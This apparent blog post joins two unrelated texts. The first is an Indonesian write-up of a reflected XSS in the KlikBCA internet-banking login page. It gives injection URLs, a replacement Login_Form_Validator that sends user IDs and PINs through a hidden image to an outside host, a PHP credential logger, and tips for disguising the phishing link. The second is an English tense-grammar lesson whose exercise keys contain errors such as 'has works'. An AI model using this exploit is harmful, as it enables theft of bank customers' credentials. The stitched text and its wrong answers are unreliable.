Security KlikBCA – Recover Password With XSS

Pada tugas Jarkom lanjut kali ini saya akan membahas tentang cracking pada security Bank BCA dengan menggunakan XSS.

Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.

Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.

The Vulnerability

Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.

URL ketika password kita salah adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)

URL tersebut akan menghasilkan source html sebagai berikut:
<script>
var err=‘User ID harus Alpha Numerik/User ID must be Alpha Numeric’
alert(err);
iBankForm.action=‘login.jsp’;
iBankForm.submit();
</script>

Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=TEST';alert(document.cookie);<!--
URL di atas menghasilkan source html berikut:

1 2 3 4 5 6

<script type=“text/javascript”> var err=‘TEST’;alert(document.cookie);<!–‘ alert(err); iBankForm.action=’login.jsp‘; iBankForm.submit(); </script>

Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini (klik gambar untuk lebih detil):

Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.

Strategy and Tactics

Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:

1. Meng-intercept klik tombol submit
2. Mengirimkan user dan password ke server saya
3. Mencatat user dan password di server saya

Intercepting Submit Button

Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.

1 2 3

<input type=“Submit” value=“LOGIN” name=“value(Submit)” onclick=“javascript:return Login_Form_Validator(document.frmParam)” onmouseover=“this.style.cursor=’hand’” />

Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.

var blnSubmitted = false;
function Login_Form_Validator( theForm ) {document.forms[0][‘value(user_id)’].autocomplete = ‘off’;
document.forms[0][‘value(pswd)’].autocomplete = ‘off’;

var blnResponse = false;
if (blnSubmitted) {
return false;
}

var strErrMsg = “”;
if( document.forms[0][‘value(user_id)’].value == ”) {
alert(“Silakan mengisi User ID anda/Please input your User ID”);
document.forms[0][‘value(user_id)’].focus();
return false;
}
if( document.forms[0][‘value(user_id)’].value.length>12) {
alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);
document.forms[0][‘value(user_id)’].select();
document.forms[0][‘value(user_id)’].focus();
return false;
}

if(document.forms[0][‘value(pswd)’].value == ”) {
alert(“Silakan mengisi PIN anda/Please input your PIN”);
document.forms[0][‘value(pswd)’].focus();
return false;
}
if(document.forms[0][‘value(pswd)’].value.length<6) {
alert(“PIN harus 6 Angka/PIN must be 6 digits”);
document.forms[0][‘value(pswd)’].focus();
return false;
}

//if(strErrMsg != ”) {
// alert(strErrMsg);
// return false;
//}

//blnSubmitted = confirm(”Click OK to login.”);
if ( !blnSubmitted ) {
blnSubmitted = true;
blnResponse = true;
}

//if(’< %= blnLogout %>’==’true’)
//blnResponse = false;

return blnResponse;
}

Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.

Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag <noscript> dan tag awal komentar <! agar javascript pada baris sesudahnya diabaikan browser.

Jadi URL untuk menjalankan taktik saya di atas adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';function Login_Form_Validator(theForm){alert('TEST');return false;}</script><noscript><!--

URL tersebut menghasilkan source html berikut:

<script>
var err=‘TEST’;function Login_Form_Validator(theForm){alert(‘TEST’);return false;}</script><noscript><!–‘
alert(err);
iBankForm.action=’login.jsp‘;
iBankForm.submit();
</script>

Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa mengisi username dan password. Ternyata yang muncul adalah dialog box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.

Sending username and password

Oke, sekarang ketika user mengklik submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.

Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:

<img src=“http://www.ilmuhacking.com/testcapture.php“ name=“myimage” width=“1″ height=“1″>

Sedangkan variabel yang berisi username dan password adalah:

document.forms[0][‘value(user_id)’].value
document.forms[0][‘value(pswd)’].value

Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:

'http://www.ilmuhacking.com/testcapture.php?userid='+document.forms[0]['value(user_id)'].value+'&passwd='+document.forms[0]['value(pswd)'].value

Selanjutnya saya harus membuat fungsi Login_Form_Validator mengubah atribut src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.

Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng-klik sekali lagi.

Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:

var abc=false;
function Login_Form_Validator(theForm {
if (!abc) {
document.images.myimage.src=‘http://www.ilmuhacking.com/testcapture.php‘+‘?userid=’+document.forms[0][‘value(user_id)’].value+‘&passwd=’+document.forms[0][‘value(pswd)’].value;
abc = true;
return false;
}
}

Kini sudah lengkap semua yang dibutuhkan, siap untuk diinjeksikan melalui URL sebagai berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';var abc=false;function Login_Form_Validator(theForm){if (!abc) {abc=true;document.images.myimage.src='http://www.ilmuhacking.com/testcapture.php?userid='%2Bdocument.forms[0]['value(user_id)'].value%2B'%26passwd='%2Bdocument.forms[0]['value(pswd)'].value;return false;}}</script><img name="myimage" src="http://www.ilmuhacking.com/testcapture.php" width="1" height="1"><noscript><!--

URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan membuat link dengan anchor text di samarkan, seperti ini:

Klik di sini untuk login.

Bila kita coba isi dengan username:abc1234 dan password:123456. Maka pada klik pertama akan ada request GET ke URL berikut ini:

http://www.ilmuhacking.com/testcapture.php?userid=abc1234&passwd=123456

Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.

Saving User and Password

Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini saya gunakan URL www.ilmuhacking.com/testcapture.php

Saya menyimpan user dan password dalam file capture.txt. Kode PHP yang saya gunakan untuk menyimpan user dan password adalah sebagai berikut:

1 2 3 4 5 6 7 8 9 10 11

<?php $file=fopen(“capture.txt”,“a+”); $userid=$_GET[“userid”]; $passwd=$_GET[“passwd”]; $ipaddr=$_SERVER[“REMOTE_ADDR”]; $now = date(“Ymd H:i:s”); if (!empty($userid)) { fwrite($file,“$userid =&amp;gt; $passwd (at $now from $ipaddr)\n“); } fclose($file); ?>

Kesimpulan

Ternyata bug yang di-remehkan seperti XSS sekalipun, bila di-exploit bisa jadi berbahaya. Saya telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Pesan saya: Never Underestimate Vulnerabilities

Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.

=================== [ EOF ] =====================

THE VERB PHRASE

Simple Present – Present Progressive

Form

Simple Present	Present Progressive
infinitive (3rd person singular: infinitive + ‘s’) I speak you speak he / she / it speaks we speak they speak	form of ‘be’ and verb + ing I am speaking you are speaking he / she / it is speaking we are speaking they are speaking
Exceptions
Exceptions when adding ‘s’ : For can, may, might, must, do not add s. Example: he can, she may, it must After o, ch, sh or s, add es. Example: do – he does, wash – she washes After a consonant, the final consonant y becomes ie. (but: not after a vowel) Example: worry – he worries but: play – he plays	Exceptions when adding ‘ing’ : Silent e is dropped. (but: does not apply for -ee) Example: come – coming but: agree – agreeing After a short, stressed vowel, the final consonant is doubled. Example: sit – sitting After a vowel, the final consonant l is doubled in British English (but not in American English). Example: travel – travelling (British English) but: travelling (American English) Final ie becomes y. Example: lie – lying

Use

In general or right now?

Do you want to express that something happens in general or that something is happening right now?

Simple Present	Present Progressive
in general (regularly, often, never) Colin plays football every Tuesday. present actions happening one after another First Colin plays football, then he watches TV.	right now Look! Colin is playing football now. also for several actions happening at the same time Colin is playing football and Anne is watching.
Signal words
always every … often normally usually sometimes seldom never first then	at the moment at this moment today now right now Listen! Look!
Note: The following verbs are usually only used in Simple Present: be, have, hear, know, like, love, see, smell, think, want

Timetable / Schedule or arrangement?

Do you want to express that something is arranged for the near future? Or do you refer to a time set by a timetable or schedule?

Simple Present	Present Progressive
action set by a timetable or schedule The film starts at 8 pm.	arrangement for the near future I am going to the cinema tonight.

Daily routine or just for a limited period of time?

Do you want to talk about a daily routine? Or do you want to emphasis that something is only going on for a limited (rather short) period of time?

Simple Present	Present Progressive
daily routine Bob works in a restaurant.	only for a limited period of time (does not have to happen directly at the moment of speaking) Jenny is working in a restaurant this week.

Certain Verbs

The following verbs are usually only used in Simple Present (not in the progressive form).

• state: be, cost, fit, mean, suit

Example: We are on holiday.

• possession: belong, have

Example: Sam has a cat.

• senses: feel, hear, see, smell, taste, touch

Example: He feels the cold.

• feelings: hate, hope, like, love, prefer, regret, want, wish

Example: Jane loves pizza.

• brain work: believe, know, think, understand

Example: I believe you.

• Introductory clauses for direct speech: answer, ask, reply, say

Example: “I am watching TV,“ he says.

Exercises :

1. Something_______(smell) very good.

Answer : smells

1. We______(eat) dinner at seven o’clock tonight.

Answer : are eating

1. He______(practice) the piano every day.

Answer : practices

1. They___­­___(drive) to school tomorrow.

Answer : are driving

1. I_____(believe) you.

Answer : believe

1. Maria_____(have) a cold.

Answer : has

1. Jorge______(swim) right now.

Answer : is swimming

1. John_____(hate) smoke

Answer : hates

1. Jill always_______(get) up at 6.00 A.M.

Answer : gets

1. Jerry______(mow) the lawn now.

Answer : is mowing

Simple Past Tense – Past Progressive (continous)

Form

Simple Past	Past Progressive
irregular verbs: see 2nd column of irregular verbs I spoke regular verbs: verb + ed I worked	past form of ‘be’ + ing form of verb I was speaking you were speaking he / she / it was speaking we were speaking they were speaking
Exceptions
Exceptions when adding ‘ed’ : when the final letter is e, only add d. Example: love – loved after a short, stressed vowel, the final consonant is doubled Example: admit – admitted final l is always doubled in British English (not in American English) Example: travel – travelled after a consonant, final y becomes i. (but: not after a vowel) Example: worry – he worried but: play – he played	Exceptions when adding ‘ing’ : silent e is dropped (but: does not apply for -ee) Example: come – coming but: agree – agreeing after a short, stressed vowel, the final consonant is doubled Example: sit – sitting final l is always doubled in British English (not in American English) Example: travel – travelling final ie becomes y. Example: lie – lying

Use

After another or at the same time?

Do you want to express that the actions in the past happened one after another or at the same time?

Simple Past	Past Progressive
after another She came home, switched on the computer and checked her e-mails.	at the same time Simon was playing on the computer while his brother was watchin TV.

New action or already in progress?

If you want to express that a new action happened in the middle of another action, you need both tenses: Simple Past the new action and Past Progressive for the action already in progress.

Simple Past	Past Progressive
new action My mobile rang (when I was sitting in a meeting.)	action already in progress While I was sitting in a meeting, (my mobile suddenly rang.)

Only mentioning or emphasising progress?

Do you just want to mention that an action took place in the past (also used for short actions)? Or do you want to put emphasis on the progress, e.g. that an action was taking place at a certain time?

Simple Past	Past Progressive
just mentioning Colin played football yesterday.	emphasising progress Yesterday at six o’clock, Colin was playing football.

Certain Verbs

The following verbs are usually only used in Simple Past (not in the progressive form).

• state: be, cost, fit, mean, suit

Example: We were on holiday.

• possession: belong, have

Example: Sam had a cat.

• senses: feel, hear, see, smell, taste, touch

Example: He felt the cold.

• feelings: hate, hope, like, love, prefer, regret, want, wish

Example: Jane loved pizza.

• brain work: believe, know, think, understand

Example: I did not understand him.

• introductory clauses for direct speech: answer, ask, reply, say

Example: “I am watching TV,“ he said.

Signal words

Simple Past	Past Progressive
first then If-Satz Typ II (If I talked, …)	when while as long as

Exercises :

Use either the simple past tense or the past progressive in the following sentences as approiate.

1. Gene_____(eat) dinner when his friend called.

Answer : was eating

1. While Maria was cleaning the apartment, her husband__________(sleep).

Answer : was sleeping

1. At three o’clock this morning. Eleanor________(study).

Answer : was studying

1. When Mark arrived, the Johnsons________(have) dinner, but they stopped in order to talk him.

Answer : were having

1. John_____(go) to France last year.

Answer : went

1. When the teacher_________(enter) the room, the students were talking.

Answer : entered

1. While joan was writing the report, Henry_________(look) for more information.

Answer : was looking

1. We____(see) this movie last night.

Answer : saw

1. At one time, Mr. Roberts__________(own) this building.

Answer : owned

1. Jose_______(write) a letter to his family when his pencil_______(break).

Answer : was writing, broke

Present Perfect Tense – Present Perfect Progressive (continous)

Form

Present Perfect Simple	Present Perfect Progressive
irregular verbs: form of ‘have’ + 3rd column of irregular verbs Example: I / you / we / they have spoken he / she / it has spoken regular verbs: form of ‘have’ + infinitive + ed Example: I / you / we / they have worked he / she / it has worked	form of ‘have’ + been + verb + ing Example: I / you / we / they have been speaking he / she / it has been speaking
Exceptions
Exceptions when adding ‘ed’ : when the final letter is e, only add d Example: love – loved after a short, stressed vowel, the final consonant is doubled Example: admit – admitted final l is always doubled in British English (not in American English) Example: travel – travelled after a consonant, final y becomes i (but: not after a vowel) Example: worry – worried but: play – played	Exceptions when adding ‘ing’ : silent e is dropped. (but: does not apply for -ee) Example: come – coming aber: agree – agreeing after a short, stressed vowel, the final consonant is doubled Example: sit – sitting after a vowel, the final consonant l is doubled in British English (but not in American English). Example: travel – travelling final ie becomes y. Example: lie – lying

Use

Both tenses are used to express that an action began in the past and is still going on or has just finished. In many cases, both forms are correct, but there is often a difference in meaning: We use the Present Perfect Simple mainly to express that an action is completed or to emphasise the result. We use the Present Perfect Progressive to emphasise the duration or continuous course of an action.

Result or duration?

Do you want to express what has happened so far or how long an action has been going on yet?

Present Perfect Simple	Present Perfect Progressive
Result (what / how much / how often) I have written 5 letters. / I have been to London twice.	Duration (how long) I have been writing for an hour.

Certain verbs

The following verbs are usually only used in Present Perfect Simple (not in the progressive form).

• state: be, have (for possession only)

Example: We have been on holiday for two weeks.

• senses: feel, hear, see, smell, taste, touch

Example: He has touched the painting.

• brain work: believe, know, think, understand

Example: I have known him for 3 years.

Emphasis on completion or duration?

Do you want to emphasise the completion of an action or its continuous course (how has somebody spent his time)?

Present Perfect Simple	Present Perfect Progressive
Emphasis on completion I have done my homework. (Meaning: My homework is completed now.)	Emphasis on duration I have been doing my homework. (Meaning: That’s how I have spent my time. It does not matter whether the homework is completed now.)

Result or side effect?

Do you want to express that a completed action led to a desired result or that the action had an unwanted side effect?

Present Perfect Simple	Present Perfect Progressive
desired result I have washed the car. (Result: The car is clean now.)	unwanted side effect Why are you so wet? – I have been washing the car. (side effect: I became wet when I was washing the car. It does not matter whether the car is clean now.)

Time + negation: last time or beginning of an action?

In negative sentences: Do you want to express how much time has past since the last time the action took place or since the beginning of the action?

Present Perfect Simple	Present Perfect Progressive
since the last time I haven’t played that game for years. (Meaning: It’s years ago that I last played that game.)	since the beginning I haven’t been playing that game for an hour, only for 10 minutes. (Meaning: It’s not even an hour ago that I started to play that game.)

Permanent or temporary?

If an action is still going on and we want to express that it is a permanent situation, we would usually use the Present Perfect Simple. For temporary situations, we would prefer the Present Perfect Progressive. This is not a rule, however, only a tendency.

Present Perfect Simple	Present Perfect Progressive
permanent James has lived in this town for 10 years. (Meaning: He is a permanent resident of this town.)	temporary James has been living here for a year. (Meaning: This situation is only temporary. Maybe he is an exchange student and only here for one or two years.)

Signal words

Present Perfect Simple	Present Perfect Progressive
how often … times	how long since for

Exercises :

Use either the present perfect or the simple past in the following sentences.

1. John____(write) his report last night.

Answer : Wrote

1. Bob______(see) this movie before.

Answer : has seen

1. Jorge______(read) the newspaper already.

Answer : has read

1. Mr. Johnson_______(work) in the same place for thirty-five years.

Answer : has works

1. We_______(begin; negative) to study for the test yet.

Answer : haven’t begun

1. George______(go) to the store at ten o’clock this morning.

Answer : went

1. Joan_______(travel) around the world.

Answer : has traveled

1. Betty______(write) a letter last night.

Answer : wrote

1. Guillermo_______(call) his employer yesterday.

Answer : called

1. We________(see; negative) this movie yet.

Answer : have not seen

Past Perfect Tense – Past Perfect Progressive (continous)

Past Perfect

The past perfect is used to indicate :

• An action that happened before another action in the past; there usually are two actions in the sentence.
• A state which continued for a time in the past, but stopped before now.

Past Perfect Progressive

The past perfect progressive puts emphasis on the course or duration of an action taking place before a certain time in the past.

Form

• A: He had been talking.
• N: He had not been talking.
• Q: Had he been talking?

Use

• action taking place before a certain time in the past
• sometimes interchangeable with past perfect simple
• puts emphasis on the course or duration of an action

signal words

• for, since, the whole day, all day

Exercises :

Supply the past perfect or simple past in the following sentences.

1. The policeman read the suspect his rights after he_______(arrest) him.

Answer : had arrested

1. After John______(wash) his clothes, he began study.

Answer : had washed

1. George______(wait) for one hour before the bus came.

Answer : has waited

1. Maria______(enter) the university after she had graduated from the community college.

Answer : entered

1. Jeanette______(wash) the pipettes after she had completed the experiment.

Answer : washed

1. Jane sent a letter to her university after she________(receive) her scholarship check.

Answer : has received

1. After the stewardesses had served lunch to the passengers, they________(sit) down.

Answer : sat

1. The car______(flip) ten times before it landed on its roof.

Answer : had flipped

1. We corrected our papers after we________(take) the quiz.

Answer : had taken

10.  John______(live) in Miami for one year when his parents came to visit.

Answer : had lived